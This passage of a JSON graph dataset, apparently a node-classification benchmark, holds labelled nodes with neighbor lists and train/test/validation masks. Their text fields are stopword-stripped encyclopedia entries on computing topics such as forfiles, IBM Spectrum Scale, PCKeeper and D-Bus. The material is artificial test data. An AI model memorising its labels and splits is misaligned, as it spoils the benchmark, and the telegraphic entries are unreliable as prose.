    "text": "Forfiles:forfiles codice_1 computer software utility microsoft windows selects files runs command file selection criteria include name last modified date command specifier supports special syntax options used directly command-line batch files scripts codice_1 command originally provided add-on windows nt resource kits became standard utility windows vista part new management features codice_1 command several command-line switches switches parameters given outputs name every file current directory command string executed given except noted sequences form 0x literal ff represents two-digit hexadecimal number replaced corresponding single-byte value used embed non-printing ascii characters extended ascii characters sequence replaced literal quotation mark though recommended use instead hide command interpreter several variables provided used command placeholders values file variables technically required must used command vary file date switch /d selects files based last modified date given date argument date argument given literal date mm/dd/yyyy format date formats accepted alternatively date argument given number case taken mean age days i.e. day date days present date date argument begins minus files modified given date selected older file modified earlier otherwise files modified given date selected younger files modified later explicit plus may given default note modes select files given date way select files given date without also either following command selects log files *.log windows directory 30 days older lists date following command would delete files use required examples internal command processor rather external utility programs",
    "neighbors": [
      3970,
      8834,
      10631,
      2568,
      6281,
      6797,
      655,
      3856,
      8976,
      4248,
      8729,
      155,
      4001,
      9505,
      4771,
      7847,
      808,
      7983,
      7088,
      10033,
      9780,
      1978,
      7356,
      5437,
      7486,
      10428,
      960,
      3522,
      8517,
      1741,
      4174,
      10068,
      1750,
      9946,
      10727,
      6506,
      9709,
      1647,
      9839,
      2545,
      4850,
      7411,
      8692,
      11249,
      6396
    ],
    "mask": "None"
  },
  {
    "node_id": 6675,
    "label": 2,
    "text": "Timeline_of_operating_systems:timeline operating systems article presents timeline events history computer operating systems 1951 current day narrative explaining overall developments see history operating systems",
    "neighbors": [
      2560,
      10755,
      6148,
      1031,
      3594,
      6155,
      4114,
      7187,
      532,
      9751,
      10776,
      25,
      1561,
      9756,
      4637,
      11297,
      9762,
      4643,
      6179,
      6180,
      6186,
      557,
      7217,
      8754,
      10803,
      7733,
      4151,
      9784,
      10809,
      573,
      6207,
      576,
      2625,
      3650,
      8767,
      1606,
      8774,
      2120,
      1611,
      2637,
      6221,
      5714,
      1623,
      3160,
      9308,
      10333,
      3167,
      97,
      11363,
      9829,
      6248,
      6760,
      10856,
      9835,
      8301,
      6772,
      7285,
      4727,
      2168,
      633,
      634,
      1147,
      2172,
      3197,
      1150,
      639,
      640,
      5247,
      11390,
      2179,
      6787,
      10883,
      9353,
      3722,
      10891,
      6797,
      10382,
      6289,
      9361,
      11411,
      2196,
      6296,
      2201,
      9370,
      9882,
      4764,
      9887,
      11430,
      7848,
      3241,
      7849,
      10411,
      8876,
      8879,
      3248,
      689,
      178,
      3250,
      9907,
      6837,
      6329,
      8889,
      1213,
      5823,
      1219,
      8388,
      10436,
      6342,
      8902,
      1736,
      2248,
      9927,
      9931,
      3791,
      5840,
      7382,
      8410,
      10458,
      4316,
      5853,
      9436,
      1247,
      11489,
      9444,
      1253,
      6377,
      7403,
      10475,
      242,
      2290,
      5363,
      9466,
      3323,
      9468,
      2813,
      1278,
      2303,
      11517,
      11013,
      9991,
      1804,
      273,
      8977,
      787,
      789,
      5397,
      1304,
      3359,
      10016,
      292,
      10235,
      2345,
      7983,
      2355,
      7477,
      823,
      7480,
      4409,
      10040,
      2363,
      6459,
      2365,
      2366,
      7483,
      7999,
      321,
      6979,
      10564,
      1349,
      11075,
      4423,
      5452,
      6988,
      9549,
      5457,
      7507,
      11604,
      7511,
      5982,
      10590,
      3426,
      868,
      3429,
      8551,
      3948,
      2925,
      5484,
      7020,
      11635,
      5492,
      2933,
      1399,
      2424,
      376,
      9335,
      8573,
      5503,
      7039,
      6529,
      5506,
      4483,
      8063,
      8069,
      10113,
      3463,
      6023,
      10627,
      394,
      3978,
      4492,
      7053,
      912,
      7057,
      8082,
      11153,
      4505,
      11675,
      2462,
      5022,
      3488,
      5534,
      11171,
      421,
      1445,
      935,
      6056,
      4521,
      10149,
      9643,
      428,
      4525,
      11184,
      7601,
      1971,
      10676,
      9141,
      6075,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      9162,
      9166,
      7133,
      6624,
      4067,
      5603,
      4074,
      10730,
      10731,
      8687,
      6128,
      5105,
      499,
      2035,
      5619,
      5115,
      6652
    ],
    "mask": "Train"
  },
  {
    "node_id": 6676,
    "label": 2,
    "text": "VX-REXX:vx-rexx vx-rexx highly extensible rexx gui development system os/2 developed watcom initially released 1993 much new code ecomstation written using vx-rexx though rexx 3gl vx-rexx interface allows build rexx programs using combination 3gl 4gl techniques drag-and-drop interface inserting code allows quite complex programs built without actually entering code vx-rexx interface written vx-rexx means extended and/or modified using rexx code also number macro hooks used add functionality directly toolbox contains number standard tools static text group box push button radio button check box picture box image push/radio button list box combo box drop-down single multiline entry field slider specialized ones container value-set notebook dde client timer additional controls built using som distributed .dll files anything simple variants existing controls tri-state check box self-validating entry field completely custom-drawn controls example self-contained tic-tac-toe board written c compiled added vx-rexx project",
    "neighbors": [
      4410,
      2462
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6677,
    "label": 6,
    "text": "IBM_Spectrum_Scale:ibm spectrum scale ibm spectrum scale high-performance clustered file system software developed ibm deployed shared-disk shared-nothing distributed parallel modes used many world largest commercial companies well supercomputers top 500 list example filesystem asc purple supercomputer composed 12,000 processors 2 petabytes total disk storage spanning 11,000 disks 2015 spectrum scale known ibm general parallel file system gpfs like typical cluster filesystems spectrum scale provides concurrent high-speed file access applications executing multiple nodes clusters used aix 5l clusters linux clusters microsoft windows server heterogeneous cluster aix linux windows nodes addition providing filesystem storage capabilities spectrum scale provides tools management administration spectrum scale cluster allows shared access file systems remote spectrum scale clusters spectrum scale available ibm aix since 1998 linux since 2001 windows server since 2008 spectrum scale known gpfs began tiger shark file system research project ibm almaden research center early 1993 tiger shark initially designed support high throughput multimedia applications design turned well suited scientific computing another ancestor spectrum scale ibm vesta filesystem developed research project ibm thomas j. watson research center 1992 1995 vesta introduced concept file partitioning accommodate needs parallel applications run high-performance multicomputers parallel i/o subsystems partitioning file sequence bytes rather multiple disjoint sequences may accessed parallel partitioning abstracts away number type i/o nodes hosting filesystem allows variety logically partitioned views files regardless physical distribution data within i/o nodes disjoint sequences arranged correspond individual processes parallel application allowing improved scalability vesta commercialized piofs filesystem around 1994 succeeded gpfs around 1998 main difference older newer filesystems gpfs replaced specialized interface offered vesta/piofs standard unix api features support high performance parallel i/o hidden users implemented hood spectrum scale available ibm aix since 1998 linux since 2001 windows server since 2008 spectrum scale offered part ibm system cluster 1350 today spectrum scale used many top 500 supercomputers listed top 500 supercomputing sites web site since inception spectrum scale successfully deployed many commercial applications including digital media grid analytics scalable file services 2010 ibm previewed version gpfs included capability known gpfs-snc snc stands shared nothing cluster officially released gpfs 3.5 december 2012 known fpo features spectrum scale file systems include high availability ability used heterogeneous cluster disaster recovery security dmapi hsm ilm spectrum scale clustered file system breaks file blocks configured size less 1 megabyte distributed across multiple cluster nodes system stores data standard block storage values includes internal raid layer called spectrum scale raid virtualize volumes redundancy parallel access much like raid block storage system also ability replicate across volumes higher file level features architecture include hadoop hdfs filesystem designed store similar greater quantities data commodity hardware — datacenters without raid disks storage area network san compared spectrum scale storage pools allow grouping disks within file system administrator create tiers storage grouping disks based performance locality reliability characteristics example one pool could high-performance fibre channel disks another economical sata storage fileset sub-tree file system namespace provides way partition namespace smaller manageable units filesets provide administrative boundary used set quotas specified policy control initial data placement data migration data single fileset reside one storage pools file data resides migrated based set rules user defined policy two types user defined policies spectrum scale file placement file management file placement policies direct file data files created appropriate storage pool file placement rules selected attributes file name user name fileset file management policies allow file data moved replicated files deleted file management policies used move data one pool another without changing file location directory structure file management policies determined file attributes last access time path name size file spectrum scale policy processing engine scalable run many nodes allows management policies applied single file system billions files complete hours",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      5273,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3323,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2394,
      2395,
      2397,
      10596,
      2407,
      10087,
      5492,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      6532,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      4017,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      1480,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 6678,
    "label": 2,
    "text": "Resource_Measurement_Facility:resource measurement facility resource measurement facility rmf performance monitor z/os operating system also collects data long-term performance analysis capacity planning product consists following components rmf significantly enhanced every release z/os operating system – approximately year – enhancements occurring support new hardware new processor models",
    "neighbors": [
      909,
      9838,
      9814,
      2168,
      5562
    ],
    "mask": "Test"
  },
  {
    "node_id": 6679,
    "label": 4,
    "text": "SpywareBlaster:spywareblaster spywareblaster antispyware antiadware program microsoft windows designed block installation activex malware spywareblaster prevents download installation execution spyware adware browser hijackers dialers malicious programs based activex spywareblaster works basis blacklists activating killbit clsid known malware programs effectively preventing infecting protected computer approach differs many anti-spyware programs typically offer user chance scan hard drive computer memory remove unwanted software installed spywareblaster also allows user prevent privacy risks tracking cookies another feature ability restrict actions websites known distributors adware spyware spywareblaster supports several web browsers including internet explorer mozilla firefox google chrome spywareblaster currently distributed freeware non-commercial users",
    "neighbors": [
      10026,
      6797,
      877,
      7983,
      7515,
      4309,
      10392,
      3739,
      4542
    ],
    "mask": "Test"
  },
  {
    "node_id": 6680,
    "label": 2,
    "text": "Urpmi:urpmi urpmi package management tool installing removing updating querying software packages local remote networked media wraps around rpm package manager rpm package manager user suffer often-encountered dependency hell works official sources mandriva unofficial sources penguin liberation front graphical front-end rpmdrake made 2 parts addition now-defunct mandriva linux also used urpmi developed experiment pascal rigaux pixel address rpm install limitations maintained françois pons different mandriva employees currently 2010-2013 maintained thierry vignaud maintainer rpmdrake one co-maintainers drakx installer tools mandriva continued job mageia version used mandriva future products based mageia per øyvind karlsen maintains fork urpmi rosa linux backporting fixes improvements thierry vignaud work version used mandriva business server based mageia",
    "neighbors": [
      11525,
      2310,
      8582,
      10760,
      2955,
      7435,
      4493,
      7181,
      7947,
      2448,
      9487,
      788,
      1813,
      8213,
      10900,
      8476,
      5670,
      4775,
      7847,
      6828,
      6446,
      1455,
      7983,
      1842,
      823,
      2872,
      6583,
      3131,
      5819,
      10172,
      190,
      3649,
      10817,
      9671,
      5067,
      3918,
      463,
      10192,
      3667,
      6227,
      4309,
      4951,
      6361,
      2010,
      9564,
      2401,
      1379,
      7140,
      741,
      231,
      5096,
      4841,
      6119,
      9063,
      9324,
      7920,
      2417,
      1138,
      1522,
      6257,
      10096,
      6393,
      7293
    ],
    "mask": "Test"
  },
  {
    "node_id": 6681,
    "label": 5,
    "text": "RS-449:rs-449 rs-449 specification also known eia-449 tia-449 defines functional mechanical characteristics interface data terminal equipment typically computer data communications equipment typically modem terminal server effort replace rs-232c offering much higher performance longer cable lengths emerged unwieldy system requiring dc-37 de-9 connectors effort eventually abandoned favor rs-530 used single db-25 connector full title standard eia-449 general purpose 37-position 9-position interface data terminal equipment data circuit-terminating equipment employing serial binary data interchange late 1970s eia began developing two new serial data standards replace rs-232 rs-232 number issues limited performance practicality among relatively large voltages used signalling +5 -5v mark space supply +12v power supply typically required made somewhat difficult implement market rapidly dominated +5/0v transistor-transistor logic ttl circuitry even lower-voltage cmos implementations high voltages unbalanced communications also resulted relatively short cable lengths nominally set maximum although practice could somewhat longer running slower speeds reason large voltages due ground voltages rs-232 included protective ground signal ground standard define implemented often case protective ground left unconnected signal ground connected ground ends result slight difference ground potential two ends cable voltage signal ground pin might zero large signal voltages needed provide positive signal case address problem new rs-422 rs-423 standards used well-defined grounding always based sender reference made signal 400 mv reference case rs-422 instance every signal second pin operating opposite voltage thereby balancing voltages always providing positive signal process starting decision made unbundle mechanical aspects standard electrical former becoming rs-449 standards track primary difference rs-422 rs-423 former return line every signal later single shared signal ground meant rs-422 double number signal wires along changes number connections began grow point even rs-423 functionally similar rs-232 longer fit db25 connector led use larger dc-37 even enough pins support rs-422 solved adding additional ground wires separate de-9 connector resulted horrendous number wires conclusion 1983 success ... remains seen standard rarely used although could found network communication equipment eia-449-1 rescinded january 1986 superseded eia/tia-530-a final version eia-449-1 withdrawn september 2002 widespread use rs-422/423 early apple macintosh computers used simple 9-pin din connector inter-machine links used three-wire connectors",
    "neighbors": [
      10242,
      9860,
      3847,
      649,
      9868,
      1297,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      2206,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      7865,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      7364,
      11332,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      1121,
      1893,
      10341,
      10344,
      11112,
      6764,
      367,
      8432,
      5875,
      6651,
      5118,
      2431
    ],
    "mask": "Test"
  },
  {
    "node_id": 6682,
    "label": 5,
    "text": "Aggregate_Server_Access_Protocol:aggregate server access protocol aggregate server access protocol used reliable server pooling rserpool framework communication",
    "neighbors": [
      10242,
      6531,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      6723,
      7364,
      2887,
      8265,
      2509,
      6733,
      4687,
      5843,
      6740,
      2904,
      6746,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 6683,
    "label": 4,
    "text": "PCKeeper:pckeeper pckeeper advertised optimization services package featuring set software utilities windows os owned essentware s.a. company based bratislava slovakia includes 2 separate products windows pckeeper live pckeeper antivirus pckeeper originally developed zeobit llc founded 2009 slava kolomiychuk pckeeper released september 2010 kromtech alliance acquired pckeeper mackeeper zeobit may 2013 2015 pckeeper changed legal owners kromtech alliance corp. essentware s.a. kromtech alliance made decision focus products mac users essentware s.a. office registered panama principal officers developers company remain ukraine two class action lawsuits filed kromtech mac os version pckeeper mackeeper first lawsuit filed illinois alleges contrary zeobit marketing in-software representations however neither free trial full registered versions mackeeper perform credible diagnostic testing user mac instead zeobit intentionally designed mackeeper invariably ominously report consumer mac needs repair at-risk due harmful errors privacy threats problems regardless computer actual condition second complaint filed holly yencha pennsylvania alleges free starter version mackeeper identifies harmless programs critical problems complaint claims mackeeper reporting algorithm even brand new computers 'critical condition require repair purchasing full version pckeeper live sometimes installed users pcs partner programs cause unwanted pop-up windows pckeeper live offers 13 different pc services 4 categories human assistance find fix geek demand live support security anti-theft data hider shredder files recovery cleaning disk cleaner disk explorer duplicates finder uninstaller optimization context menu manager startup manager pckeeper sometimes advertised pop ads many pop ads occur pornography websites pckeeper live rated good 3.5 5 pcmag editor stating improves pc performance great novice users utility wo n't clean pc well iolo system mechanic considering accessibility wallet friendliness one check kromtech pckeeper live human specialists unique price plans make tune-up utility worthy consideration rival applications offer better pc improvement techradar.pro rates 3 5 stars noted overall pckeeper light-weight tool wo n't annoy pop-up windows consider fact pckeeper live optimization features easily found free tools simply useful price kromtech solution seems unreasonably high kromtech 24/7 support elevates pckeeper live overpriced utility program tool even non-geek use optimize his/her computer pckeeper reviewed wide range tech experts reviewed turkish french portuguese spanish german review pcmag thus described pckeeper live improves pc performance multiple price points advice microsoft-certified computer specialists anti-theft technology gained 3,5 5 points pckeeper antivirus integrates avira secure anti-virus api savapi official interface avira ’ anti-malware scanning engine pckeeper antivirus block malware-hosting url phishing url according virus bulletin pckeeper antivirus pro scored 96.1 rap tests set stability level stable pckeeper antivirus got vb100 award pckeeper antivirus version 1.x received 2 opswat gold certifications antispyware antivirus categories german organization av-test.org tested 25 anti-virus programs testers found ahnlab microsoft windows defender pckeeper antivirus lowest performing anti-virus applications windows 8.1 pcmag rated pckeeper antivirus good 3 5 noting pckeeper antivirus streamlined attractive interface easy use non-techies good score hands-on malware blocking testing however scored poorly independent lab testing chat based support soured fact served misinformation pc mag concluded 'd better panda free antivirus 2015 editors choice free antivirus slightly edged pckeeper tests swept field lab tests high marks across board price pckeeper could bitdefender antivirus plus 2015 kaspersky anti-virus 2015 named editors choice paid antivirus better choice may 2013 pckeeper let customers decide much pay software launching pay want campaign",
    "neighbors": [
      5380,
      2213,
      3342,
      7983,
      4464,
      4889,
      1242
    ],
    "mask": "Train"
  },
  {
    "node_id": 6684,
    "label": 4,
    "text": "Eric_Robi:eric robi eric robi american forensic computer examiner president computer forensic consulting firm university instructor advanced computer forensics eric robi founded federal forensics group 2002 subsequently renamed elluma discovery 2010 reflect expanded range services growth electronic discovery computer forensics marketplace also instructor advanced computer forensics california state university fullerton extended education taught classes computer programming multimedia tools california state university los angeles eric obtained certified computer examiner certification southeast cybercrime institute kennesaw state university 2004 rendered testimony approximately 14 trials nasd arbitration many hearings depositions conducted computer forensic work 250 cases june 2010 eric robi interviewed fox 11 news los angeles computer scareware january 2009 interviewed fox 11 news cell phone spyware may 2009 also interviewed cbs news dallas cell phone spyware technology may 2010",
    "neighbors": [
      9469,
      9319
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6685,
    "label": 2,
    "text": "Sendo_X:sendo x sendo x sendo first series 60 based high-end phone developed sendo switched microsoft symbian series 60 platforms among unique features sendo x one ability users download new firmware sendo website upgrade phone home computer sendo shunted multiple times sendo z100 new release dates cancelling phone november 2002 announced switch microsoft smartphone 2002 operating system series 60 platform decision resulted 2004q2 release sendo x phone made celestica czech republic however least model number stickers mention made netherlands referring distribution centre arnhem netherlands.. sendo pinball funny farmer sendo licensed opera mobile 6.2 updates worked version 8.0 mobilegazette.com impressed feature richness without over-bloated call phone stylish",
    "neighbors": [
      10658,
      11469,
      7246,
      7983,
      2259,
      4701
    ],
    "mask": "None"
  },
  {
    "node_id": 6686,
    "label": 2,
    "text": "ZAP_File:zap file .zap file zero administration package text file allows publishing application user microsoft windows system windows 2000 xp professional windows vista windows 7 professional applications .msi file exist used active directory domains installed using group policy .zap file simple complicated system administrator wishes make two required fields .zap file application name called friendly name setup command line information optional .zap file begins title line consisting word application inside single square brackets underneath come entry fields two required fields friendlyname name setupcommand \\\\server\\share\\setupfile also add optional entries displayversion publisher note displayversion publisher require quotation marks around variables simple example .zap file .zap file restricted .msi file rolled back application fails install correctly use elevated privileges install i.e user needs rights install software usually given group policy install first use install separate feature first use many .zap files require user intervention overcome systems administrator creates batch file runs quiet silent install batch file command however running executable file setup.exe often bypasses quiet passive silent installation switches even specified setupcommand addition .zap files run automatically prior user logon instead user must access add/remove programs within windows control panel select add new programs select installation user must access location .zap file located access location setup files locations different otherwise able install application .zap files assigned computers must published users therefore user moves another computer even temporarily install application machine whether program finally .zap files automatically uninstall user longer requires software instead software remains installed machine permanently unlike .msi installation set uninstall computer removed relevant ou creating .zap file placing accessible share usually creating active directory group access location systems administrator needs create group policy object open editing screen select user configuration software settings software installation create new package location .zap file since gpos default .msi system admin needs ensure search .zap files instead .msi files accepting new package assigning gpo relevant organizational unit ou publish application user need reload group policy server manages gpo done either logging running gpupdate command line",
    "neighbors": [
      9173,
      929,
      6797,
      4174
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6687,
    "label": 5,
    "text": "LAPDm:lapdm lapdm data link layer protocol used gsm cellular networks lapdm forms layer 2 um interface base transceiver station mobile station say used radio link cellular network subscriber handset lapdm derived much older link layer protocol called hdlc specified 3gpp specifications ts 04.05 ts 04.06 lapdm similar isdn layer 2 lapd simplifications another important difference lapdm lapd establishment contention resolution procedure gsm 04.06 section 5.4.1.4 wherein ms sends l3 message information field sabm frame echoed back bts corresponding ua frame procedure required lapdm possibility handset accidentally attempting use wrong channel lapd require contention resolution since hard-wired isdn devices accidentally use wrong channel associated control procedure used layer 2 iden rf interface similar lapdm",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 6688,
    "label": 8,
    "text": "SOAP_with_Attachments:soap attachments soap attachments swa mime web services use web services send receive files combination soap mime primarily http note swa new specification rather mechanism using existing soap mime facilities perfect transmission files using web services invocations swa w3c note submitted proposal adopted w3c instead mtom w3c recommendation handling binary data soap messages release soap 1.2 additionally note soap 1.2 attachment feature published",
    "neighbors": [
      4740,
      2091,
      10486,
      119,
      124
    ],
    "mask": "Test"
  },
  {
    "node_id": 6689,
    "label": 5,
    "text": "Licklider_Transmission_Protocol:licklider transmission protocol licklider transmission protocol point point protocol use deep space links ltp commonly seen standard underlying convergence layer protocol bundle protocol rfc 5050 supporting wide selection networks ltp named honor american computer scientist joseph carl robnett licklider ltp designed run directly data link layer e.g aos also run user datagram protocol udp e.g used sensor network private network bandwidth contestation ’ issue software debug purposes therefore address issues like routing congestion control originally designed support “ long-haul ” transmission interplanetary network design based experiences ccsds file delivery protocol cfdp developed space communication features application divides data send two parts either part may size 0 ltp engine stores data queue checks whether link towards destination available starts transmission link available data remains queue transmission starts soon so-called “ link state cue ” arrives either underlying link layer management information base given red data send last segment red data marked “ end red data ” flag timer started segment absent green data send “ end block ” flag set otherwise green data transmitted last segment part gets marked “ end block ” flag receiver issues report segment sender received “ end red data ” segment data complete report segment transmitted timer started upon arrival report segment sender cancels timer queues report-acknowledgement receiver informs application red data successfully transmitted receiver receives report-acknowledgement cancels timer transmission red data completed transmission completed “ end block ” segment arrived two reference implementations ltp",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      6993,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      6651
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6690,
    "label": 6,
    "text": "Share_permissions:share permissions share permissions implemented ntfs fat file systems shared resource different permissions read change full control permissions also implemented samba",
    "neighbors": [
      2193,
      651,
      1509,
      6797
    ],
    "mask": "None"
  },
  {
    "node_id": 6691,
    "label": 2,
    "text": "Karen_Sandler:karen sandler karen sandler executive director software freedom conservancy former executive director gnome foundation attorney former general counsel software freedom law center march 2014 sandler executive director software freedom conservancy june 2011 march 2014 sandler served executive director gnome foundation leadership gnome embarked ambitious project draw women free open source software outreach program women october 31 2005 june 21 2011 worked software freedom law center sflc first counsel organization general counsel january 6 2010 sflc sandler advised wide range free open source software organizations free software foundation apache software foundation x.org foundation software public interest software freedom conservancy sflc became public speaker issues free open source software conferences oscon scale linuxcon 2010 led initiative advocating free software implantable medical devices exploring issues surrounding software implanted medical device defibrillator regulates inherited heart condition addition work software freedom conservancy sandler also served general counsel pro bono non-profit question copyright also co-host software freedom law show 2008-2010 free freedom 2010- podcasts sandler received 2017 free software award work promoting software freedom working sflc sandler worked associate corporate departments gibson dunn crutcher llp new york clifford chance new york london sandler received law degree columbia law school 2000 james kent scholar co-founder columbia science technology law review received bachelor degree engineering cooper union may 21 2011 married mike tarantino grammy nominated music engineer wedding invitation working paper record player playable record covered number internet publications record contained song sandler tarantino made together",
    "neighbors": [
      1026,
      11394,
      2955,
      5644,
      6413,
      4367,
      8848,
      657,
      9872,
      1939,
      3859,
      2581,
      3478,
      10255,
      6808,
      10642,
      7450,
      1822,
      6302,
      7584,
      802,
      5410,
      6947,
      8354,
      6694,
      5931,
      8364,
      8621,
      9908,
      1717,
      823,
      2109,
      11069,
      10687,
      3649,
      708,
      10822,
      3015,
      8263,
      843,
      589,
      6352,
      4177,
      11602,
      8787,
      4437,
      6489,
      3802,
      4831,
      9696,
      11232,
      5095,
      4459,
      7793,
      1394,
      1396,
      3189,
      11643
    ],
    "mask": "None"
  },
  {
    "node_id": 6692,
    "label": 4,
    "text": "Replay_4:replay 4 replay 4 proprietary backup disaster recovery software windows application servers developed appassure software released september 9 2009 replay 4 uses image-based approach backup taking snapshot moment time provides application integration mission-critical microsoft applications including microsoft exchange sql sharepoint hyper-v. replay 4 also supports windows small business servers domain controllers file servers web servers blackberry enterprise servers replay 4 provides support advanced features block level snapshots incremental forever data capture integrated data deduplication bare-metal restore dissimilar hardware failover virtual machines offsite cloud recovery etc latest version adds ability replicate data off-site storage also incorporates new technology data deduplication replay 4 named 2009 backup disaster recovery software product year storage magazine february 2010 may 2010 replay 4 named new server software product year 8th annual american business awards",
    "neighbors": [
      2208,
      7905,
      3366,
      4074,
      10413,
      1358,
      7983,
      6514,
      9655
    ],
    "mask": "Test"
  },
  {
    "node_id": 6693,
    "label": 9,
    "text": "Xprint:xprint xprint deprecated printing extension x window system allows application render output printer would display device server portion xprt uses extension xpextension handle paged output devices xprint outputs postscript pcl 3 pcl 5 raster bitmap printer resolution xprint based iso 10175 specifications applications frameworks supporting xprint include mozilla mozilla firefox qt athena motif lesstif toolkits xprint first introduced x11r6.3 rewritten inclusion x11r6.8 removed x.org server may 2008 xprint available separate repository",
    "neighbors": [
      7626,
      8628
    ],
    "mask": "None"
  },
  {
    "node_id": 6694,
    "label": 5,
    "text": "D-Bus:d-bus computing d-bus desktop bus software bus inter-process communication ipc remote procedure call rpc mechanism allows communication multiple computer programs processes concurrently running machine d-bus developed part freedesktop.org project initiated havoc pennington red hat standardize services provided linux desktop environments gnome kde freedesktop.org project also developed free open-source software library called libdbus reference implementation specification library confused d-bus indeed implementations d-bus client library also exist gdbus gnome qtdbus qt/kde dbus-java sd-bus part systemd d-bus ipc mechanism initially designed replace software component communications systems used gnome kde linux desktop environments corba dcop respectively components desktop environments normally distributed many processes one providing —usually one— services services may used regular client applications components desktop environment perform tasks due large number processes involved —adding processes providing services clients accessing them— establishing one-to-one ipc communications becomes inefficient quite unreliable approach instead d-bus provides software-bus abstraction gathers communications group processes single shared virtual channel processes connected bus n't know internally implemented d-bus specification guarantees processes connected bus communicate linux desktop environments take advantage d-bus facilities instantiating one bus many process connect number buses provided granted access practice means user process connect system bus current session bus another user session buses even different session bus owned user latter restriction may change future user sessions combined single user bus d-bus provides additional simplifies existing functionality applications including information-sharing modularity privilege separation example information incoming voice-call received bluetooth skype propagated interpreted currently-running music player react muting volume pausing playback call finished d-bus also used framework integrate different components user application instance office suite communicate session bus share data word processor spreadsheet every connection bus identified context d-bus called bus name bus name consists two dot-separated strings letters digits dashes underscores example valid bus name process sets connection bus bus assigns connection special bus name called unique connection name bus names type immutable—it guaranteed wo n't change long connection exists—and importantly ca n't reused bus lifetime means connection bus ever assigned unique connection name even process closes connection bus creates new one unique connection names easily recognizable start the—otherwise forbidden—colon character example unique connection name characters colon particular meaning process ask additional bus names connection provided requested name already used another connection bus d-bus parlance bus name assigned connection said connection owns bus name sense bus name ca n't owned two connections time unlike unique connection names names reused available process may reclaim bus name released —purposely not— another process idea behind additional bus names commonly called well-known names provide way refer service using prearranged bus name instance service reports current time date system bus lies process whose connection owns bus name regardless process bus names used simple way implement single instance applications second instances detect bus name already taken also used track service process lifecycle since bus sends notification bus name released due process termination original conception replacement several component oriented communications systems d-bus shares predecessors object model express semantics communications clients services terms used d-bus object model mimic used object oriented programming languages n't mean d-bus somehow limited oop languages —in fact used implementation written c procedural programming language d-bus process offers services exposing objects objects methods invoked signals object emit methods signals collectively referred members object client connected bus interact object using methods making requests commanding object perform actions instance object representing time service queried client using method returns current date time client also listen signals object emits state changes due certain events usually related underlying service example would service manages hardware devices —such usb network drives— signals new hardware device added event clients instruct bus interested receiving certain signals particular object since d-bus bus passes signals processes registered interest process connected d-bus bus request export many d-bus objects wants object identified object path string numbers letters underscores separated prefixed slash character called resemblance unix filesystem paths object path selected requesting process must unique context bus connection example valid object path however enforced —but also discouraged— form hierarchies within object paths particular naming convention objects service entirely developers service many developers choose namespace using reserved domain name project prefix e.g every object inextricably associated particular bus connection exported d-bus point view lives context connection therefore order able use certain service client must indicate object path providing desired service also bus name service process connected bus turn allows several processes connected bus export different objects identical object paths unambiguously members —methods signals— used object specified interface interface set declarations methods including passing returning parameters signals including parameters identified dot-separated name resembling java language interfaces notation example valid interface name despite similarity interface names bus names mistaken d-bus object implement several interfaces least must implement one providing support every method signal defined combination interfaces implemented object called object type using object good practice client process provide member interface name besides member name mandatory ambiguity caused duplicated member names available different interfaces implemented object —otherwise selected member undefined erroneous emitted signal hand must always indicate interface belongs d-bus specification also defines several standard interfaces objects may want implement addition interfaces although technically optional d-bus service developers choose support exported objects since offer important additional features d-bus clients introspection standard interfaces d-bus specification defines number administrative bus operations called bus services performed using object resides bus name bus reserves special bus name manages requests made specifically combination bus name object path administrative operations provided bus defined object interface operations used example provide information status bus manage request release additional well-known bus names d-bus conceived generic high-level inter-process communication system accomplish goals d-bus communications based exchange messages processes instead raw bytes d-bus messages high-level discrete items process send bus another connected process messages well-defined structure even types data carried payload defined allowing bus validate reject ill-formed message regard d-bus closer rpc mechanism classic ipc mechanism type definition system marshaling bus supports two modes interchanging messages client service process every d-bus message consists header body header formed several fields identify type message sender well information required deliver message recipient destination bus name object path method signal name interface name etc. body contains data payload receiver process interprets —for instance input output arguments data encoded well known binary format called wire format supports serialization various types integers floating-point numbers strings compound types also referred marshaling d-bus 